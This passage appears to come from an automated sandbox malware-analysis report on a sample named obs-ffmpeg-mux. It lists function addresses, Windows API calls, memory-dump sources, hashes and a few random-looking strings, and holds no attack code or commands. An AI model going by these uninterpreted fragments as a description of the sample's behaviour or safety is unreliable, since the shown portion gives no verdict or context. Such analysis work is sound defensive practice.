                                                              • Part of subcall function 00007FFDA3781740: __std_exception_destroy.LIBVCRUNTIME ref: 00007FFDA3781764
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::___std_exception_destroystd::_std::exception::exception
                                                            • String ID:
                                                            • API String ID: 334543182-0
                                                            • Opcode ID: 1ad72d16db5e4e34c7c9a22dc0980642c782bde0021419f7094d8e40de1cc953
                                                            • Instruction ID: bc72f3479a51274acbf2e0667f116eecd189ea6e8a178ffc2eba5cd611f5c929
                                                            • Opcode Fuzzy Hash: 1ad72d16db5e4e34c7c9a22dc0980642c782bde0021419f7094d8e40de1cc953
                                                            • Instruction Fuzzy Hash: 4AF03A72A1D78196D620DB24F45005FBBA1F7D4380F004225F6CE42B6ADF2CD6508F44
                                                            Function 00007FFDA37B8470 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::exception::exception.LIBCONCRTD ref: 00007FFDA37B848D
                                                              • Part of subcall function 00007FFDA37C5750: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA37C577A
                                                              • Part of subcall function 00007FFDA3781740: __std_exception_destroy.LIBVCRUNTIME ref: 00007FFDA3781764
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::___std_exception_destroystd::_std::exception::exception
                                                            • String ID:
                                                            • API String ID: 334543182-0
                                                            • Opcode ID: 426d3e2c33755d3bce3cc85705c37ff274f78f68303871ddc1ab5b432b61cdd3
                                                            • Instruction ID: 5453649fb429d3af830275e6bb815a49b751fc331f7f781feb0efa10cfeaf5e6
                                                            • Opcode Fuzzy Hash: 426d3e2c33755d3bce3cc85705c37ff274f78f68303871ddc1ab5b432b61cdd3
                                                            • Instruction Fuzzy Hash: 5FF03A32A1DB8096D620DB24E45005FBBA2F7D4380F404225F6CE42B6ADF2CD6508F44
                                                            Function 00007FFDA37B5B80 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::exception::exception.LIBCONCRTD ref: 00007FFDA37B5B9D
                                                              • Part of subcall function 00007FFDA37C39B0: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA37C39DA
                                                              • Part of subcall function 00007FFDA3781740: __std_exception_destroy.LIBVCRUNTIME ref: 00007FFDA3781764
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::___std_exception_destroystd::_std::exception::exception
                                                            • String ID:
                                                            • API String ID: 334543182-0
                                                            • Opcode ID: c2f0b236a9177193b180c6e070b1e12fc7ec68ad2798504ebcd06691d843ca5e
                                                            • Instruction ID: 212ffc169b9dfedd0034d3ebe7c05831f42135185ef775fdf64ffda4078871a3
                                                            • Opcode Fuzzy Hash: c2f0b236a9177193b180c6e070b1e12fc7ec68ad2798504ebcd06691d843ca5e
                                                            • Instruction Fuzzy Hash: BDF05E32A1D78086D620DB24F45105FBBA1F7D4384F004625F6CE42B6ADF3CD6508F44
                                                            Function 00007FFDA3817BEC Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFDA3817C00
                                                              • Part of subcall function 00007FFDA3819B3C: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FFDA3819B44
                                                              • Part of subcall function 00007FFDA3819B3C: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FFDA3819B49
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                            • String ID:
                                                            • API String ID: 1208906642-0
                                                            • Opcode ID: 7ddbe64a41c3b7593a1eb05dc136318fc7dd4b03cdc50444681009cc995a7ba4
                                                            • Instruction ID: b4a97addb0aa6bd9dadb73b3ac39174fd7a56967e9a0da1edddbc0440f41b281
                                                            • Opcode Fuzzy Hash: 7ddbe64a41c3b7593a1eb05dc136318fc7dd4b03cdc50444681009cc995a7ba4
                                                            • Instruction Fuzzy Hash: E3E0BD24F0F24381FE6927B114B62BA02431F2A345F5014F9E85E723C39E0F259A12AE
                                                            Function 00007FFDA37FFE50 Relevance: 1.3, APIs: 1, Instructions: 34memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(?,?,?,?,?,?,?,?,00007FFDA37FF18A,?,?,?,?,?,00007FFDA37FF0C2), ref: 00007FFDA37FFED8
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 21a8a37349105141fa278252c084f81f93000577d8081977c40e31af36a154f9
                                                            • Instruction ID: fd6e141ed7a730aaa14977f488f6a430d3911a592a60357178202839f5713707
                                                            • Opcode Fuzzy Hash: 21a8a37349105141fa278252c084f81f93000577d8081977c40e31af36a154f9
                                                            • Instruction Fuzzy Hash: E1011E76719A8086DB10DB59F4A102EB7A1FBC8BD4F400525FA8E93B1BDF6DD0108B44
                                                            Function 00007FFDA3800450 Relevance: 1.3, APIs: 1, Instructions: 34memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(?,?,?,?,?,?,?,?,00007FFDA37FF55A,?,?,?,?,?,00007FFDA37FEDF2), ref: 00007FFDA38004D9
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: a3c52f73df9ec95b24d398fbf66d159fce54f6067754a736d1129e920c84b9c0
                                                            • Instruction ID: a0469dd5f14af3b011c518462c787669c7f6b6328453972894cced2848f7ab01
                                                            • Opcode Fuzzy Hash: a3c52f73df9ec95b24d398fbf66d159fce54f6067754a736d1129e920c84b9c0
                                                            • Instruction Fuzzy Hash: B6011E76719A8086DB10DB55F4A112EB761FBC8BD4F400525FA8E53B1BDF6DC0108B44
                                                            Function 00007FFDA382E428 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • HeapAlloc.KERNEL32(?,?,?,00007FFDA3833A81,?,?,00000000,00007FFDA3835E1F,?,?,?,00007FFDA3828F4F,?,?,?,00007FFDA3828E45), ref: 00007FFDA382E466
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: AllocHeap
                                                            • String ID:
                                                            • API String ID: 4292702814-0
                                                            • Opcode ID: f6e6523b2f2504fa5484128a047749874d8fc6bc715663fce23db5fc44841a8f
                                                            • Instruction ID: ce7dbd59fc22c7c3ed8fa668241cae6917af10a9ee913a694806f67085603866
                                                            • Opcode Fuzzy Hash: f6e6523b2f2504fa5484128a047749874d8fc6bc715663fce23db5fc44841a8f
                                                            • Instruction Fuzzy Hash: C7F05851F4FA0645FE945BF26861279128A5F487A4F4806B0D93EA63C3DE2FB640815E

                                                            Non-executed Functions

                                                            Function 00007FF71E742A10 Relevance: 65.0, APIs: 32, Strings: 5, Instructions: 209stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2315304374.00007FF71E741000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF71E740000, based on PE: true
                                                            • Associated: 00000007.00000002.2315272675.00007FF71E740000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000007.00000002.2315376130.00007FF71E749000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff71e740000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: strncmp$__acrt_iob_func$av_dict_freeav_strerrorfprintfos_event_destroyprintf$av_dict_get$__stdio_common_vfprintf_errnoav_dict_countav_dict_parse_stringav_mallocavformat_write_headeravio_alloc_contextavio_openmemmovepthread_createpthread_mutex_initstrerror
                                                            • String ID: %s=%s$Couldn't open '%s', %s$Error opening '%s': %s$Failed to parse muxer settings: %s%s$Using muxer settings:
                                                            • API String ID: 1381075981-2826353358
                                                            • Opcode ID: 0ced714b6d2bafb841ab697dc7cb68e417ab27a254e86fbca716fd3c82a395c5
                                                            • Instruction ID: 1ed9d9ae791ff28ad853303be4245a66776c3f24c1d14a868c7dda11cfd85948
                                                            • Opcode Fuzzy Hash: 0ced714b6d2bafb841ab697dc7cb68e417ab27a254e86fbca716fd3c82a395c5
                                                            • Instruction Fuzzy Hash: 6BA14031B18E8695F715FB21E4503F8A3A0FB5DB98F804136EA5D47695EF28F16C8360
                                                            Function 00007FFDA378B000 Relevance: 63.3, APIs: 33, Strings: 3, Instructions: 275threadtimewindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: File$Thread$Unlock$ApplicationContextGlobalInfoTimeUnregister$ActiveAttributeCallbackCloseCodeCommCompareConfigConsoleConvertCopyCycleDefaultDescriptionDesktopDialogDrawDynamicFirmwareFreeHeaderIdleInformationLastLocalLocaleLockMemoryMenuMessageNotificationOpenOutputPagePopupPostPowerProcessorQueryRecoveryRegisterResourceRestartSettingStateStatusStringSwitchSystemTableThreadpoolTimerTransactedVirtualWaitWaitableWindowWriteZone
                                                            • String ID: 36YMEIBV9oXGNulBJ1KD3iBRICkz$Mc9yVyrrF81I8nhMbW$whz4589668j16TK6j6u
                                                            • API String ID: 2521435026-2341502400
                                                            • Opcode ID: 342572929dba6877dbf87edbaa89eec22a8a8c10d428da45cae2a3f23dff9a40
                                                            • Instruction ID: 6d4032fb03f705786c089ff223f7604f185ccfefc9488f0e6ed2cd2f1d82f9cc
                                                            • Opcode Fuzzy Hash: 342572929dba6877dbf87edbaa89eec22a8a8c10d428da45cae2a3f23dff9a40
                                                            • Instruction Fuzzy Hash: C7D10C72B096818BE718CB79F46572EB7A2FB88714F404139E68A86E59CF7ED4448F04
                                                            Function 00007FFDA37872D0 Relevance: 61.5, APIs: 25, Strings: 10, Instructions: 281registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: ClassCreateRegisterWindow
                                                            • String ID: ($6$Display Image$ImageWindowClass$\black_square.bmp$\log.txt$d$d$test.bmp$test_folder
                                                            • API String ID: 3469048531-3260786524
                                                            • Opcode ID: ebf4775afadf4d86822c46044f5eb4a65e45efbd56ca254905293bb9fd32ded0
                                                            • Instruction ID: 137a48038ca050933c28bde276412aa032a586f81abb7cd70602e77b66f85997
                                                            • Opcode Fuzzy Hash: ebf4775afadf4d86822c46044f5eb4a65e45efbd56ca254905293bb9fd32ded0
                                                            • Instruction Fuzzy Hash: ABF1FB3261ABC186E7709B24F4643EAB3A1FB88744F404136D68D53BAADF3ED548CB44
                                                            Function 00007FF71E742EE0 Relevance: 54.6, APIs: 29, Strings: 2, Instructions: 313COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2315304374.00007FF71E741000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF71E740000, based on PE: true
                                                            • Associated: 00000007.00000002.2315272675.00007FF71E740000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000007.00000002.2315376130.00007FF71E749000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff71e740000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: __acrt_iob_func$freemalloc$fprintf$ByteCharMultiWideav_rescale_q_rndrealloc$ErrorMode__stdio_common_vfprintf_fileno_setmodeav_interleaved_write_frameav_strerrormemsetsetvbuf
                                                            • String ID: Couldn't initialize muxer$av_interleaved_write_frame failed: %d: %s
                                                            • API String ID: 4192084208-164389310
                                                            • Opcode ID: 90e4d641eae2122b72088982d14054dbbcc6ef952270b6c02c8a2abd6878b3b9
                                                            • Instruction ID: a664183ef19d72d4f01f0891c70d722e01fc7b12da6499e03271e27065d4f59b
                                                            • Opcode Fuzzy Hash: 90e4d641eae2122b72088982d14054dbbcc6ef952270b6c02c8a2abd6878b3b9
                                                            • Instruction Fuzzy Hash: 97E16032B08E8296FB20AF61E8502B9A7A1FB4DBA4F904135DE0D57B64DF3CE54D8710
                                                            Function 00007FFDA378B06A Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 100threadtimewindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: File$Thread$Unlock$ApplicationContextGlobalInfoTimeUnregister$ActiveAttributeCallbackCloseCodeCommCompareConfigConsoleConvertCopyCycleDefaultDescriptionDesktopDialogDrawDynamicFirmwareFreeHeaderIdleInformationLastLocalLocaleLockMemoryMenuMessageNotificationOpenOutputPagePopupPostPowerProcessorQueryRecoveryRegisterResourceRestartSettingStateStatusStringSwitchSystemTableThreadpoolTimerTransactedVirtualWaitWaitableWindowWriteZone
                                                            • String ID: Mc9yVyrrF81I8nhMbW
                                                            • API String ID: 2521435026-2854145577
                                                            • Opcode ID: 9eb9c32ecc3793094e3e0259e83fc8d5483a42bf7bd3da25acae09e77ff658f6
                                                            • Instruction ID: 71b8e4a30943a03d9e8da854e70b651e5a14d7f2ad4668fa4f25275b456a7545
                                                            • Opcode Fuzzy Hash: 9eb9c32ecc3793094e3e0259e83fc8d5483a42bf7bd3da25acae09e77ff658f6
                                                            • Instruction Fuzzy Hash: 7B412B32A092818BE728CB78E465B2FB7A2FF8C755F404439E64A96E54CF7ED0448F04
                                                            Function 00007FFDA378647B Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139filethreadtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Create$File$AttributeAttributesCalendarCleanupClearConsoleCurrentDirectoryEnumExitFatalGroupInfoOutputPolicyPowerProcessReadRequestThreadpoolTimerTransactedUnwindWaitable
                                                            • String ID: 4YgmeHHUP3brHzFpJn$5&$UH9SFhRbpgSGL7O4w3HBA6J
                                                            • API String ID: 7356578-2820822260
                                                            • Opcode ID: c237d36b6081e8f9d9b5ca64b80175cccc46456322e90ebc39d284cc713df59f
                                                            • Instruction ID: baf3dbb9b132cf62ff8618446be9d41dcf7bdddc86c697c4676049c6259e58bc
                                                            • Opcode Fuzzy Hash: c237d36b6081e8f9d9b5ca64b80175cccc46456322e90ebc39d284cc713df59f
                                                            • Instruction Fuzzy Hash: D961A4727082418FE758CF7DE464B1EB7E2FB88744F504029A68AC6A59DB7EE404CF04
                                                            Function 00007FFDA383B92C Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                            • String ID:
                                                            • API String ID: 1617910340-0
                                                            • Opcode ID: a7983f4caa02c877ed0858cf448dbab459246fc011ac8466e7508116e98ac634
                                                            • Instruction ID: e7dae818ac1b0128fcb63206e8b61f990c2c4f2cb96706a0b4c4a12949f03eb4
                                                            • Opcode Fuzzy Hash: a7983f4caa02c877ed0858cf448dbab459246fc011ac8466e7508116e98ac634
                                                            • Instruction Fuzzy Hash: DFC1D372B29A4186EB15CFB5C4A12BC3772FB89B98B110265DE2E67796CF3ED011C304
                                                            Function 00007FF71E743C5C Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2315304374.00007FF71E741000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF71E740000, based on PE: true
                                                            • Associated: 00000007.00000002.2315272675.00007FF71E740000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000007.00000002.2315376130.00007FF71E749000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff71e740000_obs-ffmpeg-mux.jbxd
                                                            Similarity
